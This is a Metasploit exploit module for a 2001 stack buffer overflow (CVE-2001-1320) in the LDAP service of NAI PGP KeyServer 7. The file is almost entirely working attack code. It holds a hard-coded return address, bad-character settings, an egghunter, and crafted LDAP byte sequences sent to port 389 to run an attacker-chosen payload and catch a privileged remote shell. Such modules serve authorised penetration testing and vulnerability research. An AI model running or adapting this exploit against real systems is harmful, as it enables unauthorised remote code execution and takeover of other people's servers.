##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the LDAP service that is
          part of the NAI PGP Enterprise product suite. This module was tested
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is
          used to find our payload - therefore you may wish to adjust WfsDelay.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-1320' ],
          [ 'OSVDB', '4742' ],
          [ 'BID', '3046' ],
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 450,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
        ],
      'DisclosureDate' => 'Jul 16 2001',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(389)
      ])
  end

  def exploit
    connect

    # - Maximum payload space is 102 so we use EggHunter instead.
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

    hunter	= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg	= hunter[1]

    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
    eggend = "\x80\x00"

    print_status("Sending trigger and hunter first...")

    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
    buf << [target['Ret']].pack('V') + hunter[0]
    buf << "\x00"

    sock.put(buf)

    disconnect

    connect

    print_status("Sending hunted payload...")
    sock.put(eggstart+egg+eggend)

    handler
    disconnect
  end
end
